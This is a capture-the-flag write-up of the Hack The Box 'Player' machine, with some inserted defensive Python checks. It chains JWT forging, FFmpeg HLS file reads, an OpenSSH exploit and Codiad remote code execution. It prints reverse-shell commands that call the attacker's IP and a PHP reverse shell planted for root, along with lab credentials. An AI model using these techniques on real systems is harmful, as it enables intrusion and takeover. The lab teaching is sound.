Hey guys, Player from Hack The Box was retired, and here is my write-up about it.

This is a hard Linux machine. I added its IP address 10.10.10.145 to /etc/hosts as player.htb, so let's jump in.

Enumeration 

Nmap 

As always we start with nmap to scan for open ports and services:

```
root@ch4n:~# nmap -sC -sV 10.10.10.145
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-17 20:36 EST
Nmap scan report for player.htb (10.10.10.145)
Host is up (0.25s latency).
Not shown: 998 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 d7:30:db:b9:a0:4c:79:94:78:38:b3:43:a2:50:55:81 (DSA)
|   2048 37:2b:e4:31:ee:a6:49:0d:9f:e7:e6:01:e6:3e:0a:66 (RSA)
|   256 0c:6c:05:ed:ad:f1:75:e8:02:e4:d2:27:3e:3a:19:8f (ECDSA)
|_  256 11:b8:db:f3:cc:29:08:4a:49:ce:bf:91:73:40:a2:80 (ED25519)
80/tcp   open  http    Apache httpd 2.4.7
|_http-title: 403 Forbidden
6686/tcp open  ssh     OpenSSH 7.2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.39 seconds
```

SSH is listening on port 22, a web server is running on port 80 and there is a second SSH service on port 6686.

The http-title script also shows that the web root returns 403.

Web Page 

Here we can see that it is forbidden.

Then I used wfuzz to brute-force directories:

```
root@ch4n:~# wfuzz -c -w /usr/share/seclists/Discovery/Web-Content/raft-small-directories.txt --hc 404,401,302,403 http://player.htb/FUZZ

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://player.htb/FUZZ
Total requests: 20116

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000018125:   301        9 L      28 W     310 Ch      "launcher"
```

Here we got a directory called launcher. Let's check it :-)

Launcher

Seems like nothing interesting :-)

So the next thing I wanted to do was scan for subdomains:

```
root@ch4n:~# wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.player.htb" -u http://10.10.10.145 -t 100

Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.

********************************************************
* Wfuzz 2.4 - The Web Fuzzer                           *
********************************************************

Target: http://10.10.10.145/
Total requests: 19983

===================================================================
ID           Response   Lines    Word     Chars       Payload
===================================================================

000000019:   200        86 L     229 W    5243 Ch     "dev"
000000067:   200        63 L     180 W    1470 Ch     "staging"
000000070:   200        259 L    714 W    9513 Ch     "chat"

Total time: 143.2438
Processed Requests: 19983
Filtered Requests: 19980
Requests/sec.: 139.5033
```

Here we got three subdomains, so I added all of them to /etc/hosts.

dev.player.htb

On dev.player.htb it seems we need creds to log in. I don't have any creds yet, so let's move on.

staging.player.htb

Here the "Contact core team" form is interesting: when I submitted something I got a 501 internal error.

So I looked at it in Burp and then with curl:

```
root@ch4n:~# curl http://staging.player.htb/contact.php
array(3) {
  [0]=>
  array(4) {
    ["file"]=>
    string(28) "/var/www/staging/contact.php"
    ["line"]=>
    int(6)
    ["function"]=>
    string(1) "c"
    ["args"]=>
    array(1) {
      [0]=>
      &string(9) "Cleveland"
    }
  }
  [1]=>
  array(4) {
    ["file"]=>
    string(28) "/var/www/staging/contact.php"
    ["line"]=>
    int(3)
    ["function"]=>
    string(1) "b"
    ["args"]=>
    array(1) {
      [0]=>
      &string(5) "Glenn"
    }
  }
  [2]=>
  array(4) {
    ["file"]=>
    string(28) "/var/www/staging/contact.php"
    ["line"]=>
    int(11)
    ["function"]=>
    string(1) "a"
    ["args"]=>
    array(1) {
      [0]=>
      &string(5) "Peter"
    }
  }
}
Database connection failed.<html><br />Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php
```

The last two lines are the interesting part; I noted them down :-)

After reading the messages on chat.player.htb, I noticed this:

```
They mentioned our staging exposing some sensitive files and main domain exposing source code which allowing them to access our product before release. Currently our team working on the fix
```

So I went back to the main page and checked the launcher page again. I captured the request with Burp when refreshing the page:

```
/launcher/dee8dc8a47256c64630d803a4c40786e.php
```

and received the following response:

```
Not released yet
```

But when I clicked

```
enter your email   send
```

I got this. It is slightly different from the previous one:

```
/launcher/dee8dc8a47256c64630d803a4c40786c.php
```

Then I got the following response.

When I checked with this cookie I got the following response :-)

Here I remembered the chat message which says that the main domain is exposing the source code.

After googling about that I found an interesting one:

PHP Source Code Disclosure

```
https://www.rapid7.com/db/vulnerabilities/http-php-temporary-file-source-disclosure
```

From the above URL:

```
Various text editors automatically save backups of each file the user chooses to open with file names such as: file.ext~, #file.ext#, ~file.ext, file.ext.bak, file.ext.tmp, file.ext.old, file.bak, file.tmp and file.old. If the user edits a PHP file in the web root, the backup that is created will not be parsed by the PHP engine upon request, but will instead be returned to the remote attacker unmodified. Thus, the script's source code is disclosed.
```

That gives us some information to work with. So I went back to Burp and added ~ after .php, and got the following PHP code :-)
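As an added example (not part of the write-up), here is the check a site owner can run against their own web root to catch exactly this class of leak: it walks the directory tree for the editor backup names listed in the Rapid7 entry and reports which PHP file each one would disclose. The web root and its files are constructed inside the script for the demonstration.

```python
"""Find editor backup copies of PHP files that a web server would hand out as plain text
(added example, not from the write-up). The name patterns are the ones in the quoted
Rapid7 entry; the web root and its files are constructed here for the demonstration."""
import os
import tempfile

BACKUP_SUFFIXES = ("~", ".bak", ".tmp", ".old")

def backup_origin(name, siblings):
    """Return the PHP file `name` is a backup of, or None.

    Covers file.php~, #file.php#, ~file.php, file.php.bak/.tmp/.old and
    file.bak/.tmp/.old when file.php exists in the same directory."""
    base = name
    if base.startswith("#") and base.endswith("#"):
        base = base[1:-1]
    elif base.startswith("~"):
        base = base[1:]
    for suffix in BACKUP_SUFFIXES:
        if base.endswith(suffix):
            base = base[: -len(suffix)]
            break
    if base == name:
        return None                  # no backup marker at all
    if base.endswith(".php"):
        return base                  # index.php~ -> index.php
    replaced = base + ".php"         # index.bak -> index.php, only if that file exists
    return replaced if replaced in siblings else None

def find_exposed_backups(webroot):
    """Walk the web root and return (backup, original) pairs, relative to webroot."""
    found = []
    for dirpath, _dirs, files in os.walk(webroot):
        siblings = set(files)
        for name in files:
            origin = backup_origin(name, siblings)
            if origin:
                found.append((os.path.relpath(os.path.join(dirpath, name), webroot), origin))
    return sorted(found)

def demo_scan():
    """Constructed web root: a few PHP files plus the backups an editor might leave behind."""
    root = tempfile.mkdtemp()
    for name in ("index.php", "index.php~", "#config.php#", "config.php.bak",
                 "auth.php", "auth.bak", "style.css", "readme.old"):
        open(os.path.join(root, name), "w").close()
    return find_exposed_backups(root)
```

Anything the scan reports should be deleted from the web root or denied by the server configuration; on this box the launcher script's `~` copy is what leaked the JWT key.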

```
HTTP/1.1 200 OK
Date: Fri, 17 Jan 2020 17:57:08 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Tue, 30 Apr 2019 12:03:54 GMT
ETag: "2e6-587be31e5b56e"
Accept-Ranges: bytes
Content-Length: 742
Connection: close

<?php
require 'vendor/autoload.php';
use \Firebase\JWT\JWT;
if(isset($_COOKIE["access"]))
{
        $key = '_S0_R@nd0m_P@ss_';
        $decoded = JWT::decode($_COOKIE["access"], base64_decode(strtr($key, '-_', '+/')), ['HS256']);
        if($decoded->access_code === "0E76658526655756207688271159624026011393")
        {
                header("Location: 7F2xxxxxxxxxxxxx/");
        }
        else
        {
                header("Location: index.html");
        }
}
else
{
        $token_payload = [
          'project' => 'PlayBuff',
          'access_code' => 'C0B137FE2D792459F26FF763CCE44574A5B5AB03'
        ];
        $key = '_S0_R@nd0m_P@ss_';
        $jwt = JWT::encode($token_payload, base64_decode(strtr($key, '-_', '+/')), 'HS256');
        $cookiename = 'access';
        setcookie('access',$jwt, time() + (86400 * 30), "/");
        header("Location: index.html");
}
?>
```

The above code issues and checks a JWT. Since the signing key is hard-coded in the disclosed source, it seems we can generate a new token for more privileges.

Let's analyze the token at https://jwt.io/

Decoding the token shows the access_code C0B137FE2D792459F26FF763CCE44574A5B5AB03,

and we need to change that access code. From the PHP source we can see that _S0_R@nd0m_P@ss_ is the key and the privileged access code is 0E76658526655756207688271159624026011393.

Using that access code and the key we can generate a new token.
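To make clear why the disclosed source settles this, here is the same HS256 check in Python as an added example (not code from the write-up or from php-jwt): it reproduces the PHP key derivation `base64_decode(strtr($key, '-_', '+/'))` and the access_code gate. A payload edited without the key fails verification, so the gate's only protection was the secrecy of that hard-coded key.

```python
"""HS256 check as the disclosed launcher PHP performs it (added example, not code
from the write-up or from php-jwt). Reproduces the key derivation base64_decode(strtr($key, '-_', '+/'))
and the access_code gate, showing that the gate rests entirely on the hard-coded key staying secret."""
import base64
import hashlib
import hmac
import json
import re

KEY_STRING = "_S0_R@nd0m_P@ss_"                                # from the disclosed source
PRIVILEGED_CODE = "0E76658526655756207688271159624026011393"  # from the disclosed source

def php_derive_key(key_string):
    """Mirror PHP's non-strict base64_decode(strtr(...)): swap URL-safe chars, drop invalid ones, tolerate missing padding."""
    swapped = key_string.translate(str.maketrans("-_", "+/"))
    cleaned = re.sub(r"[^A-Za-z0-9+/]", "", swapped)
    if len(cleaned) % 4 == 1:          # a lone trailing character carries no whole byte
        cleaned = cleaned[:-1]
    return base64.b64decode(cleaned + "=" * (-len(cleaned) % 4))

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def b64url_decode(text):
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def hs256_encode(payload, key):
    """JWT::encode equivalent: header.payload signed with HMAC-SHA256."""
    header = b64url(json.dumps({"typ": "JWT", "alg": "HS256"}, separators=(",", ":")).encode())
    body = b64url(json.dumps(payload, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url(sig)}"

def hs256_decode(token, key):
    """JWT::decode equivalent; returns the payload, or None where php-jwt would throw."""
    if token.count(".") != 2:
        return None
    header, body, sig = token.split(".")
    expected = hmac.new(key, f"{header}.{body}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(sig)):
        return None
    return json.loads(b64url_decode(body))

def launcher_gate(token, key):
    """The PHP branch: the privileged redirect only when the signed access_code matches."""
    decoded = hs256_decode(token, key)
    if decoded is not None and decoded.get("access_code") == PRIVILEGED_CODE:
        return "7F2xxxxxxxxxxxxx/"
    return "index.html"
```

The fix on the application side is a key that lives outside the web root and is not in the deployed source, plus a token that does not carry the authorization decision itself as a guessable constant.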

Here I generated the new token. Back in Burp, I got the new part of the launcher directory:


http://player.htb/launcher/7F2dcsSdZo6nj3SNMTQ1/

When we browse this URL we get this page :-)

It says "Compress and Secure your media".

When I tested with a file with a .jpg extension, the output was an AVI file.

FFmpeg HLS vulnerability

So I searched for an AVI exploit and found this:

```
https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS
```

Let's try to read /etc/passwd, so we can check whether the script works:

```
root@ch4n:~/Desktop/htb/boxes/player# python3 gen_avi.py file:///etc/passwd passwd.avi
```

I uploaded this passwd.avi file, downloaded the converted file and played it.

Here we can see that it worked, but the output looks weird, so I searched for another version.

After some googling, I found a HackerOne report:

```
https://hackerone.com/reports/237381
```

```
root@ch4n:~/Desktop/htb/boxes/player# python3 gen_avi.py file:///etc/passwd passwd.avi / etc_passwd.avi
```

Then I did the same thing.

This version is better.
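The upload check below is an added example (not part of the write-up or of the gen_avi.py PoC): it looks for an HLS playlist smuggled inside an uploaded media file and flags any non-HTTP(S) URI scheme before the file is handed to FFmpeg, which is what the converter on this box failed to do. The sample bytes are constructed.

```python
"""Checks an uploaded media file for a smuggled HLS playlist before it reaches FFmpeg
(added example, not from the write-up or the gen_avi.py PoC). The converter above feeds
user uploads to FFmpeg, whose HLS demuxer follows playlist URIs, so a playlist hidden in an
AVI can make it read local files. The sample upload below is constructed for this demo."""
import re

# scheme:rest, where rest runs to whitespace, comma, pipe or quote; concat chains are split by '|'
URI_RE = re.compile(r'(?<![A-Za-z0-9+.\-])([A-Za-z][A-Za-z0-9+.\-]*):[^\s,|"]*')
SAFE_SCHEMES = {"http", "https"}

def embedded_playlist(data):
    """Return the #EXTM3U ... #EXT-X-ENDLIST text found inside the bytes, or None."""
    start = data.find(b"#EXTM3U")
    if start == -1:
        return None
    end = data.find(b"#EXT-X-ENDLIST", start)
    end = len(data) if end == -1 else end + len(b"#EXT-X-ENDLIST")
    return data[start:end].decode("latin-1")

def unsafe_schemes(playlist):
    """Collect URI schemes used by the playlist (segment lines and tag attributes) other than HTTP(S)."""
    schemes = set()
    for line in playlist.splitlines():
        line = line.strip()
        if line.startswith("#"):
            line = line.partition(":")[2]          # keep only the tag's attribute list, e.g. URI="..."
        for match in URI_RE.finditer(line):
            schemes.add(match.group(1).lower())
    return sorted(schemes - SAFE_SCHEMES)

def scan_upload(data):
    """'accept' when no playlist is embedded, 'reject' when it names non-HTTP(S) schemes, else 'review'."""
    playlist = embedded_playlist(data)
    if playlist is None:
        return "accept", []
    bad = unsafe_schemes(playlist)
    return ("reject" if bad else "review"), bad

# Constructed sample: binary padding around a playlist whose segment chains an http URL with a local file.
SAMPLE_UPLOAD = (
    b"RIFF\x00\x00\x00\x00AVI " + b"\x00" * 24 +
    b"#EXTM3U\n#EXT-X-MEDIA-SEQUENCE:0\n#EXTINF:10.0,\n"
    b"concat:http://example.org/header.m3u8|file:///etc/passwd\n"
    b"#EXT-X-ENDLIST\n" + b"\x00" * 8
)
```

On the converter side, a patched FFmpeg run with a restrictive -protocol_whitelist is the real fix; this check only catches the playlist-in-a-container trick shown above.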

Then I remembered this line from the enumeration of http://staging.player.htb/contact.php:

Unknown variable user in /var/www/backup/service_config fatal error in /var/www/staging/fix.php

We need to look for service_config:

```
python3 gen_avi.py file:///var/www/backup/service_config service_config.avi
```

Here we got some creds:

username - telegen

password - 'd-bC|jC!2uepS/w'

So I am using this creds to login to ssh 

“` 

root@ch4n:~/Desktop/htb/boxes/player# ssh telegen@player.htb -p 6686 

telegen@player.htb’s password: 

Last login: Sat Jan 18 07:54:12 2020 from 10.10.15.43 

Environment: 

  USER=telegen 

  LOGNAME=telegen 

  HOME=/home/telegen 

  PATH=/usr/bin:/bin:/usr/sbin:/sbin:/usr/local/bin 

  MAIL=/var/mail/telegen 

  SHELL=/usr/bin/lshell 

  SSH_CLIENT=10.10.14.243 34562 6686 

  SSH_CONNECTION=10.10.14.243 34562 10.10.10.145 6686 

  SSH_TTY=/dev/pts/2 

  TERM=xterm-256color 

========= PlayBuff ========== 

Welcome to Staging Environment 

telegen:~$ ls 

*** forbidden command: ls 

telegen:~$ ls -la 

*** forbidden command: ls 

telegen:~$ help 

  clear  exit  help  history  lpath  lsudo 

telegen:~$ lpath 

Allowed: 

 /home/telegen 

“` 

We got a restricted shell (lshell). So I looked at my port scan again: OpenSSH 7.2 on port 6686 might be vulnerable, so I googled it and found this :-)

https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115

After running this PoC we can read files and grab user.txt.

So let's check this file.

When I tried to read /var/www/staging/fix.php with gen_avi.py, uploaded the output and downloaded the converted file, it came back blank, so I tried to read it from the poc.py shell instead and that worked :-)

```
#> .readfile /home/telegen/user.txt
DEBUG:__main__:auth_cookie: 'xxxx\nsource /home/telegen/user.txt\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:30e47abe9e315c0c39462d0cf71c0f48
#> .readfile  /var/www/staging/fix.php
DEBUG:__main__:auth_cookie: 'xxxx\nsource  /var/www/staging/fix.php\n'
DEBUG:__main__:dummy exec returned: None
INFO:__main__:<?php
class
protected
protected
protected
public
return
public
if($result
static::passed($test_name);
static::failed($test_name);
public
if($result
static::failed($test_name);
static::passed($test_name);
public
if(!$username){
$username
$password
//modified
//for
//fix
//peter
//CQXpm\z)G5D#%S$y=
public
if($result
static::passed($test_name);
static::failed($test_name);
public
echo
echo
echo
private
echo
static::$failed++;
private
static::character(".");
static::$passed++;
private
echo
static::$last_echoed
private
if(static::$last_echoed
echo
static::$last_echoed
```

Here we got:

```
username - peter
password - CQXpm\z)G5D#%S$y=
```

So we got some creds. The login page on dev.player.htb is Codiad, so I googled for Codiad exploits and found this:

```
https://github.com/WangYihang/Codiad-Remote-Code-Execute-Exploit
```

So I ran the exploit:

```
root@ch4n:~/Desktop/htb/boxes/player# python exploit.py http://dev.player.htb/ peter 'CQXpm\z)G5D#%S$y=' 10.10.14.243 9001 linux
[+] Please execute the following command on your vps:
echo 'bash -c "bash -i >/dev/tcp/10.10.14.243/9002 0>&1 2>&1"' | nc -lnvp 9001
nc -lnvp 9002
[+] Please confirm that you have done the two command above [y/n]
[Y/n] y
[+] Starting...
[+] Login Content : {"status":"success","data":{"username":"peter"}}
[+] Login success!
[+] Getting writeable path...
[+] Path Content : {"status":"success","data":{"name":"ch4n","path":"test"}}
[+] Writeable Path : test
[+] Sending payload...
```

Run the echo command in one terminal:

```
root@ch4n:~/Desktop/htb/boxes/player# echo 'bash -c "bash -i >/dev/tcp/10.10.14.243/9002 0>&1 2>&1"' | nc -lnvp 9001
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9001
Ncat: Listening on 0.0.0.0:9001
Ncat: Connection from 10.10.10.145.
Ncat: Connection from 10.10.10.145:52386.
```

Then set up the second listener and catch the www-data shell:

```
root@ch4n:~/Desktop/htb/boxes/player# nc -lnvp 9002
Ncat: Version 7.80 ( https://nmap.org/ncat )
Ncat: Listening on :::9002
Ncat: Listening on 0.0.0.0:9002
Ncat: Connection from 10.10.10.145.
Ncat: Connection from 10.10.10.145:50732.
bash: cannot set terminal process group (2272): Inappropriate ioctl for device
bash: no job control in this shell
www-data@player:/var/www/demo/components/filemanager$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

So I ran pspy and found an interesting process: /usr/bin/php /var/lib/playbuff/buff.php

/var/lib/playbuff/buff.php

```
www-data@player:/dev/shm$ cat /var/lib/playbuff/buff.php
cat /var/lib/playbuff/buff.php
<?php
include("/var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php");
class playBuff
{
        public $logFile="/var/log/playbuff/logs.txt";
        public $logData="Updated";
        public function __wakeup()
        {
                file_put_contents(__DIR__."/".$this->logFile,$this->logData);
        }
}
$buff = new playBuff();
$serialbuff = serialize($buff);
$data = file_get_contents("/var/lib/playbuff/merge.log");
if(unserialize($data))
{
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success with serialized logs!';
        }
}
else
{
        file_put_contents("/var/lib/playbuff/merge.log","no issues yet");
        $update = file_get_contents("/var/lib/playbuff/logs.txt");
        $query = mysqli_query($conn, "update stats set status='$update' where id=1");
        if($query)
        {
                echo 'Update Success!';
        }
}
?>
```

buff.php includes /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php,

and this file is owned by www-data:

```
www-data@player:/dev/shm$ cat /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
cat /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
<?php
$servername = "localhost";
$username = "root";
$password = "";
$dbname = "integrity";

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);

// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
?>
```

So I added a reverse shell to this file, like this:

```
<?php
$sock=fsockopen("10.10.14.243",311);exec("/bin/sh -i <&3 >&3 2>&3");
$servername = "localhost";
$username = "root";
$password = "";
$dbname = "integrity";

// Create connection
$conn = new mysqli($servername, $username, $password, $dbname);

// Check connection
if ($conn->connect_error) {
    die("Connection failed: " . $conn->connect_error);
}
?>
```

Then I set up the listener and got root.

That's it guys!

Hope you enjoyed my write-up.

Don't forget to check out the other write-ups on my blog:

https://0xchan.github.io/

Respect me on HTB 

https://www.hackthebox.eu/home/users/profile/81292

Author

CH4N